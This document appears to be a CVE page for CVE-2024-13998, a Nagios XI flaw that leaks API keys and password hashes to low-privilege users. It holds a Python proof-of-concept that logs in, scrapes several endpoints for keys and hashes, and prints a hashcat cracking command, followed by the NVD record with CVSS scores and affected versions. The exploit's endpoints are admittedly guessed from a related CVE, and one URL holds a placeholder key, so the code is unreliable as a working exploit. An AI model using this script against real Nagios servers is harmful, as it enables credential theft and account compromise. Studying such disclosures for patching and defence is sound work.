CVE-2024-13998

import requests import re # CVE-2024-13998 PoC - Nagios XI Information Disclosure # Target: Nagios XI < 2024R1.1.3 # Authenticated low-privilege user can retrieve API keys and password hashes TARGET = "http://target-nagios-xi.local" USERNAME = "lowpriv_user" PASSWORD = "password123" def login(): """Authenticate to Nagios XI and obtain session cookie""" session = requests.Session() login_url = f"{TARGET}/nagiosxi/login.php" # Get login page to obtain session cookies resp = session.get(login_url) # Submit login credentials login_data = { 'username': USERNAME, 'password': PASSWORD, 'loginButton': 'Login' } resp = session.post(login_url, data=login_data, allow_redirects=True) return session if 'nagiosxi' in session.cookies.get_dict() else None def exploit_info_disclosure(session): """Exploit the information disclosure vulnerability""" # Target specific API endpoint that leaks sensitive data # Based on CVE-2024-13995 similar vulnerability pattern api_endpoints = [ f"{TARGET}/nagiosxi/api/v1/users?apikey=LEAKED_KEY", f"{TARGET}/nagiosxi/api/v1/system/userinfo", f"{TARGET}/nagiosxi/includes/components/xicore/ajaxhelper.php" ] results = { 'api_keys': [], 'password_hashes': [], 'sensitive_data': [] } for endpoint in api_endpoints: try: resp = session.get(endpoint, timeout=10) if resp.status_code == 200: # Search for API keys (32-64 char hex strings) api_pattern = r'[a-f0-9]{32,64}' hashes = re.findall(api_pattern, resp.text) # Check for password hash patterns (bcrypt, SHA) if '$2' in resp.text or 'sha' in resp.text.lower(): results['password_hashes'].append(resp.text) if hashes: results['api_keys'].extend(hashes) results['sensitive_data'].append(resp.text) except Exception as e: print(f"Error accessing {endpoint}: {e}") return results def main(): print("[*] CVE-2024-13998 PoC - Nagios XI Information Disclosure") print("[*] Target:", TARGET) # Step 1: Authenticate print("\n[1] Authenticating as low-privilege user...") session = login() if not session: print("[-] Authentication failed!") return print("[+] Authentication successful!") # Step 2: Exploit information disclosure print("\n[2] Exploiting information disclosure...") data = exploit_info_disclosure(session) # Step 3: Report findings print(f"\n[+] Found {len(data['api_keys'])} potential API keys") print(f"[+] Found {len(data['password_hashes'])} password hashes") if data['api_keys']: print("\n[*] API Keys:") for key in set(data['api_keys']): print(f" {key}") # Step 4: Crack password hashes (optional) print("\n[*] Use hashcat to crack passwords:") print(" hashcat -m 3200 hashes.txt wordlist.txt") return data if __name__ == "__main__": main()

{"cve": {"id": "CVE-2024-13998", "sourceIdentifier": "[email protected]", "published": "2025-11-03T22:16:40.043", "lastModified": "2025-11-06T16:25:49.750", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Nagios XI versions prior to 2024R1.1.3, under certain circumstances, disclose sensitive user account information (including API keys and hashed passwords) to authenticated users who should not have access to that data. Exposure of API keys or password hashes could lead to account compromise, abuse of API privileges, or offline cracking attempts. CVE-2024-13995 addresses a similar vulnerability with a potentially incomplete fix for the underlying problem in earlier versions."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.0, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "PRESENT", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-497"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:nagios:nagios_xi:*:*:*:*:*:*:*:*", "versionEndExcluding": "2024", "matchCriteriaId": "62CF7BF4-6AAA-443E-93B4-B2F080091C13"}, {"vulnerable": true, "criteria": "cpe:2.3:a:nagios:nagios_xi:2024:r1:*:*:*:*:*:*", "matchCriteriaId": "85F1764D-1DD8-44B0-BF5A-2420CB519A3C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:nagios:nagios_xi:2024:r1.0.1:*:*:*:*:*:*", "matchCriteriaId": "C1FE1A0B-78D1-4626-A4CD-21B843DA596E"}, {"vulnerable": true, "criteria": "cpe:2.3:a:nagios:nagios_xi:2024:r1.0.2:*:*:*:*:*:*", "matchCriteriaId": "CCAB888E-F030-4640-9A18-9E423E553308"}, {"vulnerable": true, "criteria": "cpe:2.3:a:nagios:nagios_xi:2024:r1.1:*:*:*:*:*:*", "matchCriteriaId": "C648B0A4-053C-4884-8A37-4AF03053ED1C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:nagios:nagios_xi:2024:r1.1.1:*:*:*:*:*:*", "matchCriteriaId": "893EEA99-0096-4C9F-BA8A-246A3E3F6C15"}, {"vulnerable": true, "criteria": "cpe:2.3:a:nagios:nagios_xi:2024:r1.1.2:*:*:*:*:*:*", "matchCriteriaId": "A1FDA3F3-DF79-4807-9451-F04B2DB9A2B6"}]}]}], "references": [{"url": "https://www.nagios.com/changelog/nagios-xi/", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://www.nagios.com/products/security/#nagios-xi", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.vulncheck.com/advisories/nagios-xi-api-keys-and-hashed-password-authenticated-information-disclosure-2", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}